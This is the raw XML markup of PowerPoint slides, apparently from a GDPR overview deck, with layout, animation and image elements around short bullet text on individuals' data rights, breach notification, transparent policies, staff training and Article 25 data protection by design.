            <a:srgbClr val="000000">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661" tIns="140528" rIns="175661" bIns="140528" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="895487"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3" name="Rectangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="448642" y="2179673"/>
            <a:ext cx="2447865" cy="4477816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:alpha val="4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005556" rIns="182828" bIns="146263" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="913874"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Personal</a:t>
            </a:r>
            <a:b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privacy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="270893" y="290403"/>
            <a:ext cx="11787336" cy="1315397"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>What are the key changes with the GDPR?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Rectangle 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3318977" y="2179673"/>
            <a:ext cx="2447865" cy="4477816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:alpha val="4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005556" rIns="182828" bIns="146263" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="913874"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Controls and notifications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6190256" y="2179673"/>
            <a:ext cx="2447865" cy="4477816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:alpha val="4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005556" rIns="182828" bIns="146263" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="913874"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Transparent policies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9039760" y="2179674"/>
            <a:ext cx="2447865" cy="4493292"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2">
              <a:alpha val="4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005556" rIns="182828" bIns="146263" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="t" anchorCtr="0" forceAA="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" defTabSz="913874"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IT and training</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9168230" y="3966390"/>
            <a:ext cx="2220506" cy="2404381"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="913874" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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Organizations need to:</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Train privacy personnel and employees</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Audit and update data policies</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5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Employ a Data Protection Officer (if required)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1350" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="505050"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Segoe UI"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRP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Create and manage compliant vendor contracts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3434837" y="3966390"/>
            <a:ext cx="2332007" cy="2750684"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="913874" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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Organizations need to:</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Protect personal data by using appropriate security</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Notify authorities within 72 hours of breaches</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Obtain appropriate consent for processing data</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Keep records detailing data processing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="913874" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:endPar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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534634" y="3966390"/>
            <a:ext cx="2234837" cy="2320499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="913874" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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Individuals have the right to:</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Access their personal data</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Correct errors in their personal data</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Erase their personal data</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Object to processing of their personal data</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Export personal data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6380945" y="3966391"/>
            <a:ext cx="2108941" cy="1913447"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="913874" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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Organizations are required to:</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Provide clear notice of data collection</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Outline processing purposes and use cases</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285640" marR="0" lvl="0" indent="-285640" algn="l" defTabSz="91387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70" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Define data retention and deletion policies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="820853" y="1315837"/>
            <a:ext cx="1703446" cy="1703446"/>
            <a:chOff x="748624" y="1391440"/>
            <a:chExt cx="1703930" cy="1703930"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Oval 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="748624" y="1391440"/>
              <a:ext cx="1703930" cy="1703930"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:alpha val="90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7"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"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0246" y="2020146"/>
              <a:ext cx="780685" cy="494434"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3691188" y="1315837"/>
            <a:ext cx="1703446" cy="1703446"/>
            <a:chOff x="3661067" y="1391440"/>
            <a:chExt cx="1703930" cy="1703930"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Oval 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3661067" y="1391440"/>
              <a:ext cx="1703930" cy="1703930"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:alpha val="90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7"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>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3660" y="1888548"/>
              <a:ext cx="638741" cy="709714"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6562467" y="1315837"/>
            <a:ext cx="1703446" cy="1703446"/>
            <a:chOff x="6583831" y="1391440"/>
            <a:chExt cx="1703930" cy="1703930"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Oval 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6583831" y="1391440"/>
              <a:ext cx="1703930" cy="1703930"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:alpha val="90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7"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:endParaRPr>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9478" y="1816223"/>
              <a:ext cx="819727" cy="854364"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9411970" y="1315837"/>
            <a:ext cx="1703446" cy="1703446"/>
            <a:chOff x="9412910" y="1391440"/>
            <a:chExt cx="1703930" cy="1703930"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Oval 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="9412910" y="1391440"/>
              <a:ext cx="1703930" cy="1703930"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="tx2">
                <a:alpha val="90000"/>
              </a:schemeClr>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solidFill>
                  <a:srgbClr val="0078D7"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI"/>
                <a:ea typeface="Segoe UI" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="30" name="Picture 29"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7">
              <a:lum bright="100000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="9924580" y="1889498"/>
              <a:ext cx="680590" cy="707814"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22018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par>
                                <p:cTn id="8" presetID="35" presetClass="path" presetSubtype="0" decel="100000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -7.19939E-7 3.13209E-7 L -0.19198 3.13209E-7 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1750" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="27"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-9599" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="10" presetID="10"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35" presetClass="path" presetSubtype="0" decel="100000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 3.82946E-7 3.13209E-7 L -0.19198 3.13209E-7 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1750" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-9599" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="15" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="with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childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="18" presetID="35" presetClass="path" presetSubtype="0" decel="100000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 3.78095E-6 3.13209E-7 L -0.19199 3.13209E-7 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1750" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-9599" y="0"/>
                                    </p:animMotion>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50"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="23" presetID="35" presetClass="path" presetSubtype="0" decel="100000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 7.19939E-7 3.13209E-7 L -0.19198 3.13209E-7 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1750" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-9599" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="25" presetID="2" presetClass="entr" presetSubtype="2" decel="10000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5" grpId="0"/>
      <p:bldP spid="5" grpId="1"/>
      <p:bldP spid="27" grpId="0"/>
      <p:bldP spid="27" grpId="1"/>
      <p:bldP spid="9" grpId="0"/>
      <p:bldP spid="9"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3BCE-5944-4B6D-9167-FF29AD119851}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Data privacy–related requirements of the GDPR</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="31" name="Group 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{518A8CC7-3DF7-4138-AAF1-612B35181708}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="306766" y="1330305"/>
            <a:ext cx="5571667" cy="1638477"/>
            <a:chOff x="362351" y="1275660"/>
            <a:chExt cx="5474886" cy="1671570"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="00B0F0"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{749FF19B-6E8A-494F-B67B-8D2EC54B21DB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="362351" y="1275660"/>
              <a:ext cx="5474886" cy="16715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4" name="TextBox 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87DFB52C-2DB6-4B73-9437-5D30AAA99C74}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="481357" y="1384192"/>
              <a:ext cx="5140642" cy="1130214"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">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2353" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Segoe UI Semilight"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t>GDPR Article 25—Data protection by design and by default</a:t>
              </a:r>
            </a:p>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1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Segoe UI Semilight"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rectangle 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEA82388-AFD3-487E-AF9A-1B2F7147C1B1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="481357" y="2223057"/>
              <a:ext cx="5233876" cy="659291"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:grpFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>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 typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:buChar char="►"/>
                <a:tabLst/>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" sz="1765" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Segoe UI Semilight"/>
                  <a:ea typeface="+mn-ea"/>
                  <a:cs typeface="+mn-cs"/>
                </a:rPr>
                <a:t> Control access, process minimal necessary data, integrate safeguards </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="32" name="Group 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{818A7458-DA4C-4780-BFE5-17BCA6BC6F34}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="306768" y="3120067"/>
            <a:ext cx="5672580" cy="1654237"/>
            <a:chOff x="362351" y="3196181"/>
            <a:chExt cx="5574045" cy="1687648"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22B1DF88-3518-469F-B6C5-4A127871E470}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="362351" y="3196181"/>
              <a:ext cx="5474886" cy="1687648"/>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0" name="TextBox 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BEAED8A-7D05-46CC-AB11-9D5A05FA9B4A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
